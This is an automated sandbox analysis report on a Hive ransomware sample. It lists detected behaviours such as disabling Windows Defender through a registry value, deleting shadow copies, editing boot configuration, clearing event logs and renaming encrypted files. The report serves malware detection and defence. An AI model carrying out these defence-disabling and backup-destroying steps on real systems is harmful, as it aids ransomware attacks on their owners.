Malware Analysis Report

2024-10-16 03:12

Sample ID 220112-zlnz9adhf2
Target cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.7z
SHA256 d1b1f52ea8a58a52734e8e5a87838cbc1b0cdc277194a5390912127b1f1a208d
Tags
evasion ransomware trojan hive spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d1b1f52ea8a58a52734e8e5a87838cbc1b0cdc277194a5390912127b1f1a208d

Threat Level: Known bad

The file cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.7z was found to be: Known bad.

Malicious Activity Summary

evasion ransomware trojan hive spyware stealer

Modifies security service

Modifies Windows Defender Real-time Protection settings

Hive

Deletes Windows Defender Definitions

Deletes shadow copies

Modifies boot configuration data using bcdedit

Clears Windows event logs

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Runs net.exe

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Opens file in notepad (likely ransom note)

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-12 20:48

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 20:48

Reported

2022-01-12 20:53

Platform

win10-en-20211208

Max time kernel

11s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msdaremr.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\pt-BR\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\msado21.tlb C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcer.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcer.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipscsy.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mn.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_6vPOjo3SHM00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_O3eJ6NAmm9o0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\TabTip.exe.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InputPersonalization.exe.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_fhj5uqEg0i00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\adcvbs.inc C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\de-DE\msader15.dll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_BrE7SfGNDFI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\boxed-delete.avi C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_konMUSUuISU0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_5xFbVdOVa6s0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\hmmapi.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_eH64ombB-G00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jsse.jar.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_tbdh9qBrKy80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\th.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_vskVFmk5ASc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-CA\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_heb.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-dayi.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\accessibility.properties.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_wPYuZEWt2_o0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\es.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_vUSk8e7r4C40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\uk.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_bTJdaUGm-300.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Internet Explorer\SIGNUP\install.ins.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_gU8zTUCKuqI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\InputPersonalization.exe.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Internet Explorer\ja-JP\iexplore.exe.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_ck6QE6lo-C00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_fr.jar.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_iVlGHb6cGpo0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_zh_TW.jar.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_QWDShMEdjZU0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\msado27.tlb C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\bg-BG\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\sv-SE\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\ieinstal.exe.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\br.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_pVf4RmBDuKk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_DpoBaSyQiKU0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\invalid32x32.gif.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_GLFVhr7viu00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ba.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_ks8n0Ea6w0g0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ko-kr.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\uk-UA\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_1WYGLGA5Lak0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsjpn.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\startNetworkServer.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_D1SnkZTNpOM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\LICENSE.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_dONKzwoUmCs0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_sL2bo9ccq700.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\mshwLatin.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\Services\verisign.bmp C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcor.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\split.avi C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\lt.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_Y0SKeAHLr180.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClient.man.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_04G4rkwkJEo0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_3-96XcqWjgE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hu.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_N8RZdaiY1Bk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqlxmlx.rll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_V4hsctsr0680.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcor.dll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_bkgIS9F5Y_A0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1480 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 3812 wrote to memory of 3708 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3812 wrote to memory of 3708 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 4128 wrote to memory of 3036 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4128 wrote to memory of 3036 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 692 wrote to memory of 3500 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 692 wrote to memory of 3500 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 4072 wrote to memory of 8 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4072 wrote to memory of 8 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 4276 wrote to memory of 4228 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4276 wrote to memory of 4228 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 1480 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
PID 4216 wrote to memory of 4356 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4216 wrote to memory of 4356 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1480 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\SYSTEM32\net.exe
